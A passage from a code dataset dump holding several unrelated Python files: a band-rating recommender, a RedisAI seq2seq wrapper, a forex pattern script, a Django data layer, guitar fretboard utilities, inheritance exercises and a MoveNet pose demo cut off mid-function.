np.array(new_Y)\n\n","sub_path":"Template/datasets/example/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"243813322","text":"import math\n\nusers = {\n\n \t\t \"Paulo\": {\"Coldplay\": 5.0, \"Imagine Dragons\": 4.0, \"Cage the Elephant\": 4.3, \"Artic Monkeys\": 3.0},\n\n \t\t \"Eloa\": {\"Coldplay\": 3.0, \"Imagine Dragons\": 2.5, \"Cage the Elephant\": 5.0, \"Fleet Foxes\": 3.5},\n\n \t\t \"Will\": {\"Imagine Dragons\": 5.0, \"Cage the Elephant\": 1.5, \"Fleet Foxes\": 2.0, \"The Ink Spots\": 4.0},\n\n \t\t \"João\": {\"Coldplay\": 1.5, \"Cage the Elephant\": 3.0, \"Fleet Foxes\": 3.5, \"Artic Monkeys\": 5.0}, \n\n \t\t \"Miguel\": {\"Coldplay\":5.0, \"Fleet Foxes\": 4.6, \"Artic Monkeys\": 5.0, \"The Ink Spots\": 1.0},\n\n \t\t }\n\ndef manhattan(rating1, rating2):\n\n\tdistance = 0\n\tfor i in rating1:\n\t\tif i in rating2:\n\t\t\tdistance = distance + abs(rating1[i] - rating2[i])\n\n\treturn distance\n\ndef computeNearestNeighbor(username, users):\n\n\tdistances = []\n\tfor user in users:\n\t\tif user != username:\n\t\t\tdistance = manhattan(users[user], users[username])\n\t\t\tdistances.append((distance, user))\n\n\tdistances.sort()\n\treturn distances\n\ndef recommend(username, users):\n\n\tnearest = computeNearestNeighbor(username, users)[0][1]\n\trecommendations = []\n\n\tneighborRatings = users[nearest]\n\tuserRatings = users[username]\n\n\tfor i in neighborRatings:\n\t\tif not i in userRatings:\n\t\t\trecommendations.append((i, neighborRatings[i]))\n\n\treturn sorted(recommendations, key=lambda artistTuple: artistTuple[1], reverse = True)\n\n\"\"\" Paulo Guilherme - 1815310087 \"\"\"\n\"\"\" Sistema de recomendação colaborativa utilizando minhas bandas favoritas e meus amigos.\"\"\"\n\nprint(\"\\nTestando a funcção Manhattan:\")\na = manhattan(users[\"Eloa\"], users[\"Paulo\"])\nprint(a)\n\nprint(\"\\nTestando a funcção de Vizinho mais Próximo:\")\nb = computeNearestNeighbor(\"Paulo\", users)\nprint(b)\n\nprint(\"\\nTestando a funcção de Recomendação para o usuário informando:\")\nc = recommend(\"Miguel\", users)\nprint(c)\n","sub_path":"AP1/Filtragem_Colaborativa.py","file_name":"Filtragem_Colaborativa.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"265427103","text":"from os.path import dirname\n\nimport numpy as np\nimport redisai as rai\nimport ml2rt\nimport utils\n\n\nclass DB:\n def __init__(self, host='localhost', port=6379, db=0):\n self.max_len = 10\n self.con = rai.Client(host=host, port=port, db=db)\n\n def initiate(self):\n encoder_path = f'{dirname(__file__)}/assets/encoder.pt'\n decoder_path = f'{dirname(__file__)}/assets/decoder.pt'\n en_model = ml2rt.load_model(encoder_path)\n de_model = ml2rt.load_model(decoder_path)\n self.con.modelstore('encoder', backend='torch', device='cpu', data=en_model)\n self.con.modelstore('decoder', backend='torch', device='cpu', data=de_model)\n\n\n def process(self, nparray):\n # 4 = no layers + no directions, 1 = batch, 500 = hidden size\n # dummy_hidden = np.zeros((2, 1, 500), dtype=np.float32)\n # self.con.tensorset('hidden', tensor=dummy_hidden)\n self.con.tensorset('sentence', tensor=nparray)\n self.con.tensorset('length', tensor=np.array([nparray.shape[0]]).astype(np.int64))\n self.con.modelexecute('encoder', inputs=['sentence', 'length'], outputs=['e_output', 'hidden'])\n hidden = self.con.tensorget('hidden')[:2]\n self.con.tensorset('hidden', tensor=hidden)\n inter_tensor = np.array(utils.SOS_token, dtype=np.int64).reshape(1, 1)\n self.con.tensorset('d_input', tensor=inter_tensor)\n i = 0\n out = []\n while i < self.max_len:\n i += 1\n self.con.modelexecute(\n 'decoder',\n inputs=['d_input', 'hidden', 'e_output'],\n outputs=['d_output', 'hidden'])\n d_output = self.con.tensorget('d_output')\n # d_output_ret = d_output.reshape(1, utils.voc.num_words)\n ind = int(d_output.argmax())\n if ind == utils.EOS_token:\n break\n inter_tensor = np.array(ind, dtype=np.int64).reshape(1, 1)\n self.con.tensorset('d_input', tensor=inter_tensor)\n if ind == utils.PAD_token:\n continue\n out.append(ind)\n return utils.indices2str(out)\n\n\nif __name__ == '__main__':\n redis_db = DB()\n","sub_path":"redis_db.py","file_name":"redis_db.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"259994391","text":"import matplotlib\nimport matplotlib.pyplot as plt \nimport matplotlib.ticker as mticker \nimport matplotlib.dates as mdates\nfrom matplotlib import style \nimport numpy as np \nimport time\nimport functools\nimport pandas as pd \nimport sys\n\n\ndef percentChange(startPoint, currentPoint):\n\ttry:\n\t\tx = ((float(currentPoint)-startPoint)/abs(startPoint))*100\n\t\tif x == 0.0:\n\t\t\treturn 0.0000000001\n\t\telse:\n\t\t\treturn x\n\t\n\texcept:\n\t\treturn 0.0000000001\n\n\n\n\ndef patternStorage(file):\n\n\t# formating of the csv data file\n\n\tdf = pd.read_csv(file, parse_dates=True, \n\t\t\t\t\t\t\t \t\t\tindex_col='DateTime', \n\t\t\t\t\t\t\t \t\t\tnames=['Tid', 'Dealable', 'Pair', 'DateTime', 'Buy', 'Sell'])\n\t#df.drop(['lTid'], 1, inplace=True)\n\tdel df['Tid']\n\tdel df['Dealable']\n\tdel df['Pair']\n\n\n\tbid = df['Buy'].values\n\task = df['Sell'].values\n\n\tallData = ((bid + ask) / 2) \n\n\tpatternAr = []\n\tperformanceAr = []\n\n\tpatStarttime = time.time()\n\tx = len(allData) - 60 \n\ty = 31\n\n\twhile y < x: \n\t\tpattern = []\n\t\tfor i in range(1, 31):\n\t\t\tpattern.append(percentChange(allData[y-30], allData[y+(i-30)]))\n\t\n\n\t\toutcomeRange = allData[y+20:y+30] \n\t\tcurrentPoint = allData[y]\n\n\t\ttry: \n\t\t\tavgOutcome = functools.reduce(lambda x, y: x+y, outcomeRange) / len(outcomeRange)\n\t\texcept Exception as e: \n\t\t\tprint(str(e))\n\t\t\tavgOutcome = 0\n\n\t\tfutureOutcome = percentChange(currentPoint, avgOutcome)\n\n\t\tpatternAr.append(pattern)\n\t\tperformanceAr.append(futureOutcome)\n\n\t\ty += 100\n\n\tprint(patternAr)\n\tprint(performanceAr)\n\n\tpatterndf = pd.DataFrame(patternAr)\n\tpatterndf.to_csv('AUD_CADpatterns.csv', index=False, header=False)\n\n\tperformancedf = pd.DataFrame(performanceAr)\n\tperformancedf.to_csv('AUD_CADperformance.csv', index=False, header=False)\n\n\n\n\n# csv data file from Gain\nfile = 'AUD_CAD_Week1.csv'\n\n\n\npatternStorage(file)\n","sub_path":"storage_pc.py","file_name":"storage_pc.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"479603913","text":"from ..models import Product, Tracking\nimport datetime, pytz\n\n\nclass ProductDataLayer(object):\n @classmethod\n def create_product(cls, name) -> Product:\n '''\n create product factory function\n '''\n p = Product(name=name)\n p.save()\n return p\n\n @classmethod\n def get_product_by_id(cls, id) -> Product:\n '''\n get product by product id\n '''\n return Product.objects.get(id=id)\n\n @classmethod\n def get_all_products(cls):\n '''\n return all product objects\n '''\n return Product.objects.all()\n\n @classmethod\n def filter_product_queryset_by_text(cls, queryset, search_term):\n '''\n case insensitive text filtering in name field of product queryset\n '''\n if search_term:\n return queryset.filter(name__icontains=search_term)\n return queryset\n\n @classmethod\n def create_tracking(cls, data) -> Tracking:\n '''\n create tracking function\n '''\n p = Product.objects.get(id=data.get('product'))\n t = Tracking(\n product=p, timestamp=data.get('timestamp'),\n latitude=data.get('latitude'), longitude=data.get('longitude'),\n elevation=data.get('elevation')\n )\n t.save()\n return t\n\n\n @classmethod\n def get_tracking_by_id(cls, id) -> Tracking:\n '''\n get tracking by id\n '''\n return Tracking.objects.prefetch_related('product').get(id=id)\n\n @classmethod\n def get_all_tracking(cls):\n '''\n get all tracking models\n '''\n return Tracking.objects.prefetch_related('product').all()\n\n @classmethod\n def filter_tracking_queryset_by_text(cls, queryset, search_term):\n '''\n search queryset by text for tracking models\n '''\n if search_term:\n queryset = queryset.filter(\n product__name__icontains=search_term\n )\n return queryset\n\n @classmethod\n def filter_tracking_queryset_by_product_id(cls, queryset, id):\n if id:\n queryset = queryset.filter(\n product__id=id\n )\n return queryset\n\n @classmethod\n def filter_tracking_queryset_by_date(cls, queryset, date_string, timezone):\n '''\n timezone filtering based on timezone\n '''\n try:\n if timezone:\n d = datetime.datetime.strptime(date_string, '%Y-%m-%dT%H:%M:%S.%fZ')\n aware_date = pytz.timezone(timezone).localize(d)\n date_time = aware_date.astimezone(pytz.timezone('UTC'))\n end_date_time = date_time + datetime.timedelta(hours=23, minutes=59)\n if date_time and end_date_time:\n queryset = queryset.filter(\n timestamp__gte=date_time, timestamp__lte=end_date_time\n )\n except Exception as exc:\n pass\n return queryset\n\n\n\n @classmethod\n def edit_tracking(cls, id, data):\n '''\n edit tracking models\n '''\n p = cls.get_tracking_by_id(id)\n product = cls.get_product_by_id(data.get('product'))\n p.product = product\n p.timestamp = data.get('timestamp')\n p.latitude = data.get('latitude')\n p.longitude = data.get('longitude')\n p.elevation = data.get('elevation')\n p.save()\n return p\n\n @classmethod\n def edit_product(cls, id, data):\n '''\n edit product object\n '''\n p = cls.get_product_by_id(id)\n p.name = data.get('name')\n p.save()\n return p\n","sub_path":"products/datalayers/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"209438450","text":"r\"\"\"\nA collection of utility functions to locate notes on the fretboard.\n\nFunctions are provided for both directions.\n\"\"\"\n\nr\"\"\"\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport logging\n\nfrom collections import Counter\n\nLOG = logging.getLogger(__name__)\n\n# only consider sharps, theoretic distinction is irrelevant here\n# this way, there is always a half-step between notes\nNOTE_SEQUENCE = ['C', 'C#', 'D', 'D#', 'E', 'F',\n 'F#', 'G', 'G#', 'A', 'A#', 'B']\n# strings are determined by their open value: a note and an octave\n# important: these are ordered from high to low!\nSTANDARD_STRINGS = [('E', 4), ('B', 3), ('G', 3),\n ('D', 3), ('A', 2), ('E', 2)]\nSUPPORTED_FRETS = 25 # standard electric 22 + bends + open strings\nHS_PER_OCTAVE = len(NOTE_SEQUENCE) # or 12, but just keeping stuff connected\n\ndef fret2note(fret, string_num):\n r\"\"\"\n Given a fret number and a string, return the note and octave.\n >>> fret2note(5, 5)\n ('A', 2)\n \"\"\"\n string_note = STANDARD_STRINGS[string_num]\n current_index = NOTE_SEQUENCE.index(string_note[0])\n note_index = (current_index + fret) % HS_PER_OCTAVE\n octave_increase = (current_index + fret) // HS_PER_OCTAVE\n return (NOTE_SEQUENCE[note_index], string_note[1] + octave_increase)\n\n\ndef frets(note):\n r\"\"\"\n Given a note, generate the frets and strings\n where the note can be found on a six-string in standard tuning.\n Strings with the same note value are differentiated by their\n octave, which is the final value in the returned tuple.\n\n `note`'s value can range from 'A' to 'G#', its octave is at least\n 2 and is at most 6.\n\n Note that there may be some borderline cases when bends are used.\n The current implementation assumes SUPPORTED_FRETS - 1 actual frets\n and no bends, so the highest value that can be returned is\n (SUPPORTED_FRETS - 1, ('E', 4)).\n\n Results are always returned for low strings before high strings.\n\n >>> frets(('E', 3)).next()\n (12, ('E', 2))\n \"\"\"\n LOG.debug('Finding frets for {note}'.format(note=note))\n string = _lowest_string_with(note)\n low_to_high_strings = list(reversed(STANDARD_STRINGS))\n if string:\n fret = (NOTE_SEQUENCE.index(note[0]) + HS_PER_OCTAVE * note[1]) -\\\n (NOTE_SEQUENCE.index(string[0]) + HS_PER_OCTAVE * string[1])\n while fret >= 0:\n yield (fret, string)\n successor_index = (low_to_high_strings.index(string) + 1)\n if successor_index >= len(low_to_high_strings):\n raise StopIteration\n string = low_to_high_strings[successor_index] \n if string[0] == 'B':\n fret -= 4\n else:\n fret -= 5\n\n\ndef is_limiting(note):\n r\"\"\"\n Determine whether a supplied note is \"limiting\".\n\n Limiting notes are notes which can only be played in one position,\n or which can only be played at the sixth fret or higher.\n\n An assumption here is that only valid notes are supplied.\n >>> is_limiting(('E', 3))\n False\n \"\"\"\n count = 0\n below_six = False # something that cannot be played below 6 is limiting\n for fret in frets(note):\n count += 1\n if fret[0] <= 5:\n below_six = True\n return count <= 1 or not below_six\n\n \ndef _lowest_string_with(note):\n r\"\"\"\n Given a note, return the lowest string containing that note on a\n SUPPORTED_FRETS-1-fret guitar in standard tuning with no bends applied.\n >>> _lowest_string_with(('E', 2))\n ('E', 2)\n >>> _lowest_string_with(('E', 8))\n \"\"\"\n LOG.debug('Looking for lowest string with {note}'.format(note=note))\n for string in reversed(STANDARD_STRINGS): # want low to high!\n end_octave = string[1] + ((SUPPORTED_FRETS - 1) // HS_PER_OCTAVE)\n end_half_step = NOTE_SEQUENCE.index(string[0]) +\\\n ((SUPPORTED_FRETS - 1) % HS_PER_OCTAVE)\n if end_half_step >= HS_PER_OCTAVE:\n end_half_step = (end_half_step - HS_PER_OCTAVE) % HS_PER_OCTAVE\n end_octave += 1\n end_note = (NOTE_SEQUENCE[end_half_step], end_octave)\n if compare_notes(string, note) <= 0 and\\\n compare_notes(end_note, note) >= 0:\n return string\n return None\n\n\ndef compare_notes(note, other):\n r\"\"\"\n Given two notes, specified as a value and an octave number,\n return -1, 0 or 1, respectively, depending on whether `note` is\n lower than, equal to or higher than `other`.\n >>> compare_notes(('C', 3), ('A', 3))\n -1\n \"\"\"\n LOG.debug('Comparing notes {note}, {other}'.format(**locals()))\n return cmp(note[1] * 12 + NOTE_SEQUENCE.index(note[0]),\n other[1] * 12 + NOTE_SEQUENCE.index(other[0]))\n\n\ndef sane_chords(notes, capo=0):\n r\"\"\"\n Given a collection of notes to be played simultaneously,\n generate all \"sane\" chord configurations.\n\n Sane chord configurations are allocations of notes to frets\n where the same string is not used twice and the total stretch\n does not exceed five frets (although open strings are always\n allowed).\n\n The location of open strings is indicated by `capo` and obviously\n no positions below that position can be used.\n\n Note that some of the chords generated may still be unplayable.\n For instance, several A5 chords with the A and the E in the fifth\n octave can be generated with an open high E string.\n Arguably, this is playable with the A on any but the E strings\n because one can apply string muting.\n Therefore, it is difficult to come up with a full algorithmic\n description of what is and what is not playable.\n \"\"\"\n LOG.debug(\"Finding sane chords for {n}\".format(n=notes))\n chord_tree = _sane_chord_tree(list(notes), capo)\n if chord_tree:\n return _depth_first(chord_tree)\n\n\ndef _depth_first(chord_tree, ancestors=None):\n r\"\"\"\n Traverse a chord tree in depth-first manner.\n\n For each path down the tree, an immutable set which represents\n a \"flattened\" path is yielded.\n \"\"\"\n if not ancestors:\n ancestors = []\n nodes = chord_tree.keys()\n if not nodes:\n yield frozenset(ancestors)\n else:\n for node in nodes:\n for result in _depth_first(chord_tree[node], ancestors + [node]):\n yield result\n \n\ndef _sane_chord_tree(notes, capo, ancestors=None):\n r\"\"\"\n Given an ordered collection of notes to be played simultaneously,\n return a tree structure representing all possible configurations.\n \"\"\"\n LOG.debug('Chord tree notes: {notes}'.format(notes=notes))\n if not ancestors:\n ancestors = []\n result = {}\n if not _is_sane_configuration(ancestors, capo):\n return None\n if not notes:\n return result\n for position in frets(notes[0]):\n family = ancestors + [position]\n subtree = _sane_chord_tree(notes[1:], capo, family)\n if subtree is not None:\n result[position] = subtree\n if result:\n return result\n\ndef _is_sane_configuration(positions, capo, stretch=5):\n r\"\"\"\n Given a collection of fretboard positions, determine whether it\n seems possible to play them all as one chord.\n >>> _is_sane_configuration([(0, ('E', 2)), (2, ('A', 3))], capo=0)\n True\n \"\"\"\n strings_encountered = set()\n min_fret = None\n max_fret = None\n for position in positions:\n if position[0] < capo or position[1] in strings_encountered:\n return False\n if position[0] > capo:\n if not min_fret:\n # min and max are equal initially\n min_fret, max_fret = position[0], position[0]\n else:\n min_fret = min(min_fret, position[0])\n max_fret = max(max_fret, position[0])\n if max_fret - min_fret > stretch:\n return False\n strings_encountered.add(position[1])\n return True\n\n\ndef physical2theoretical_chord(physical):\n r\"\"\"\n Given the physical representation of a chord,\n return the theoretical representation.\n\n >>> physical2theoretical_chord({4: 7})\n Counter({('E', 3): 1})\n \"\"\"\n result = Counter()\n for string_num in physical.keys():\n note = fret2note(physical[string_num], string_num)\n result[note] += 1\n return result\n","sub_path":"pyngwie/notemappings.py","file_name":"notemappings.py","file_ext":"py","file_size_in_byte":9278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"423829690","text":"class Aparelho:\r\n #Construtor\r\n def __init__(self, marca, estado):\r\n self.__marca = marca\r\n self.__estado = estado\r\n \r\n def getMarca(self):\r\n return self.__marca\r\n \r\n def isEmQueEstado(self):\r\n return self.__estado\r\n \r\n #Métodos de instância\r\n def ligaAparelho(self):\r\n if self.__estado == True:\r\n print('Já estava ligado(a)!')\r\n else:\r\n self.__estado = True\r\n print('Ligado(a) com sucesso!')\r\n \r\n def desligaAparelho(self):\r\n if self.__estado == False:\r\n print('Já estava desligado(a)!')\r\n else:\r\n self.__estado = False\r\n print('Desligado(a) com sucesso!')\r\n \r\nclass Televisao(Aparelho):\r\n #Construtor\r\n def __init__(self, marca, estado, volume):\r\n #Chama construtor da superclasse\r\n super().__init__(marca, estado) \r\n self.__volume = volume\r\n \r\n def isEmQueVolume(self):\r\n return self.__volume\r\n \r\n #Métodos de instância\r\n def aumentaVolume(self):\r\n if self.__volume == True:\r\n print('O volume ja esta alto!')\r\n else:\r\n self.__volume = True\r\n print('O volume foi aumentado!')\r\n \r\n def abaixaVolume(self):\r\n if self.__volume == False:\r\n print('O volume ja esta baixo!')\r\n else:\r\n self.__volume = False\r\n print('O volume foi abaixado!')\r\n\r\n def mostraAtributos(self):\r\n print('A tv é da marca {}.'.format(self.getMarca()))\r\n if(self.isEmQueEstado()):\r\n print('A tv esta ligada.')\r\n else:\r\n print('A tv esta desligada.')\r\n if(self.isEmQueVolume()):\r\n print('O volume esta alto.')\r\n else:\r\n print('O volume esta baixo.')\r\n\r\nclass Celular(Aparelho):\r\n #Construtor\r\n def __init__(self, marca, estado, whatsappAberto):\r\n #Chama construtor da superclasse\r\n super().__init__(marca, estado)\r\n self.__whatsappAberto = whatsappAberto\r\n \r\n def isWhatsappAberto(self):\r\n return self.__whatsappAberto\r\n \r\n #Métodos de instância\r\n def abreWhatsapp(self):\r\n if self.__whatsappAberto == True:\r\n print('O whatsapp ja estava aberto! Tem varias pessoas no vácuo!')\r\n else:\r\n self.__whatsappAberto = True\r\n print('O whatsapp acaba de ser aberto. Há mensagens não lidas!')\r\n \r\n def fechaWhatsapp(self):\r\n if self.__whatsappAberto == False:\r\n print('O whatsapp ja estava fechado!')\r\n else:\r\n self.__whatsappAberto = False\r\n print('O whatsapp acaba de ser fechado!')\r\n \r\n def mostraAtributos(self):\r\n print('O celular é da marca {}.'.format(self.getMarca()))\r\n if(self.isEmQueEstado()):\r\n print('O celular esta ligado.')\r\n else:\r\n print('O celular esta desligado.')\r\n if(self.isWhatsappAberto()):\r\n print('O whatsapp esta aberto. Há mensagens não lidas!')\r\n else:\r\n print('O whatsapp esta fechado.')\r\n\r\nT = Televisao('Philips', False, False)\r\nT.mostraAtributos()\r\nprint(\"\"\"---------------------\r\nTentando ligar a tv e aumentar seu volume:\"\"\")\r\nT.ligaAparelho()\r\nT.aumentaVolume()\r\nprint(\"\"\"---------------------\r\nResultado após as mudanças:\"\"\")\r\nT.mostraAtributos()\r\nprint(\"\"\"---------------------\r\nTentando abaixar o volume da tv e depois desligá-la:\"\"\")\r\nT.abaixaVolume()\r\nT.desligaAparelho()\r\nprint(\"\"\"---------------------\r\nResultado após as mudanças:\"\"\")\r\nT.mostraAtributos()\r\nprint('-----------------------')\r\nC = Celular('Moto G 6', True, True)\r\nC.mostraAtributos()\r\nprint(\"\"\"---------------------\r\nTentando ligar o celular e abrir seu whatsapp:\"\"\")\r\nC.ligaAparelho()\r\nC.abreWhatsapp()\r\nprint(\"\"\"---------------------\r\nResultado após as mudanças:\"\"\")\r\nC.mostraAtributos()\r\nprint(\"\"\"---------------------\r\nTentando fechar o whatsappo do celular e depois desligá-lo:\"\"\")\r\nC.fechaWhatsapp()\r\nC.desligaAparelho()\r\nprint(\"\"\"---------------------\r\nResultado após as mudanças:\"\"\")\r\nC.mostraAtributos()","sub_path":"classes-and-attributes/2-heritages/1-Aparelho.py","file_name":"1-Aparelho.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"551684297","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport copy\nimport time\nimport argparse\n\nimport cv2 as cv\nimport numpy as np\nimport tensorflow as tf\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--device\", type=int, default=0)\n parser.add_argument(\"--file\", type=str, default=None)\n parser.add_argument(\"--width\", help='cap width', type=int, default=960)\n parser.add_argument(\"--height\", help='cap height', type=int, default=540)\n\n parser.add_argument('--mirror', action='store_true')\n\n parser.add_argument(\"--model_select\", type=int, default=0)\n parser.add_argument(\"--keypoint_score\", type=float, default=0.4)\n\n args = parser.parse_args()\n\n return args\n\n\ndef run_inference(interpreter, input_size, image):\n image_width, image_height = image.shape[1], image.shape[0]\n\n # 前処理\n input_image = cv.resize(image, dsize=(input_size, input_size)) # リサイズ\n input_image = cv.cvtColor(input_image, cv.COLOR_BGR2RGB) # BGR→RGB変換\n input_image = input_image.reshape(-1, input_size, input_size, 3) # リシェイプ\n input_image = tf.cast(input_image, dtype=tf.uint8) # uint8へキャス���\n\n # 推論\n input_details = interpreter.get_input_details()\n interpreter.set_tensor(input_details[0]['index'], input_image.numpy())\n interpreter.invoke()\n\n output_details = interpreter.get_output_details()\n keypoints_with_scores = interpreter.get_tensor(output_details[0]['index'])\n keypoints_with_scores = np.squeeze(keypoints_with_scores)\n\n # キーポイント、スコア取り出し\n keypoints = []\n scores = []\n for index in range(17):\n keypoint_x = int(image_width * keypoints_with_scores[index][1])\n keypoint_y = int(image_height * keypoints_with_scores[index][0])\n score = keypoints_with_scores[index][2]\n\n keypoints.append([keypoint_x, keypoint_y])\n scores.append(score)\n\n return keypoints, scores\n\n\ndef main():\n # 引数解析 #################################################################\n args = get_args()\n cap_device = args.device\n cap_width = args.width\n cap_height = args.height\n\n if args.file is not None:\n cap_device = args.file\n\n mirror = args.mirror\n model_select = args.model_select\n keypoint_score_th = args.keypoint_score\n\n # カメラ準備 ###############################################################\n cap = cv.VideoCapture(cap_device)\n cap.set(cv.CAP_PROP_FRAME_WIDTH, cap_width)\n cap.set(cv.CAP_PROP_FRAME_HEIGHT, cap_height)\n\n # モデルロード #############################################################\n if model_select == 0:\n model_path = 'tflite/lite-model_movenet_singlepose_lightning_tflite_float16_4.tflite'\n input_size = 192\n elif model_select == 1:\n model_path = 'tflite/lite-model_movenet_singlepose_thunder_tflite_float16_4.tflite'\n input_size = 256\n elif model_select == 2:\n model_path = 'tflite/lite-model_movenet_singlepose_lightning_tflite_int8_4.tflite'\n input_size = 192\n elif model_select == 3:\n model_path = 'tflite/lite-model_movenet_singlepose_thunder_tflite_int8_4.tflite'\n input_size = 256\n else:\n sys.exit(\n \"*** model_select {} is invalid value. Please use 0-3. ***\".format(\n model_select))\n\n interpreter = tf.lite.Interpreter(model_path=model_path)\n interpreter.allocate_tensors()\n\n while True:\n start_time = time.time()\n\n # カメラキャプチャ #####################################################\n ret, frame = cap.read()\n if not ret:\n break\n if mirror:\n frame = cv.flip(frame, 1) # ミラー表示\n debug_image = copy.deepcopy(frame)\n\n # 検出実施 ##############################################################\n keypoints, scores = run_inference(\n interpreter,\n input_size,\n frame,\n )\n\n elapsed_time = time.time() - start_time\n\n # デバッグ描画\n debug_image = draw_debug(\n debug_image,\n elapsed_time,\n keypoint_score_th,\n keypoints,\n scores,\n )\n\n # キー処理(ESC:終了) ##################################################\n key = cv.waitKey(1)\n if key == 27: # ESC\n break\n\n # 画面反映 #############################################################\n cv.imshow('MoveNet(singlepose) Demo', debug_image)\n\n cap.release()\n cv.destroyAllWindows()\n\n\ndef draw_debug(\n image,\n elapsed_time,\n keypoint_score_th,\n keypoints,\n scores,\n):\n debug_image = copy.deepcopy(image)\n\n # 0:鼻 1:左目 2:右目 3:左耳 4:右耳 5:左肩 6:右肩 7:左肘 8:右肘 # 9:左手首\n # 10:右手首 11:左股関節 12:右股関節 13:左ひざ 14:右ひざ 15:左足首 16:右足首\n # Line:鼻 → 左目\n index01, index02 = 0, 1\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:鼻 → 右目\n index01, index02 = 0, 2\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:左目 → 左耳\n index01, index02 = 1, 3\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:右目 → 右耳\n index01, index02 = 2, 4\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:鼻 → 左肩\n index01, index02 = 0, 5\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:鼻 → 右肩\n index01, index02 = 0, 6\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:左肩 → 右肩\n index01, index02 = 5, 6\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:左肩 → 左肘\n index01, index02 = 5, 7\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:左肘 → 左手首\n index01, index02 = 7, 9\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:右肩 → 右肘\n index01, index02 = 6, 8\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:右肘 → 右手首\n index01, index02 = 8, 10\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:左股関節 → 右股関節\n index01, index02 = 11, 12\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:左肩 → 左股関節\n index01, index02 = 5, 11\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n 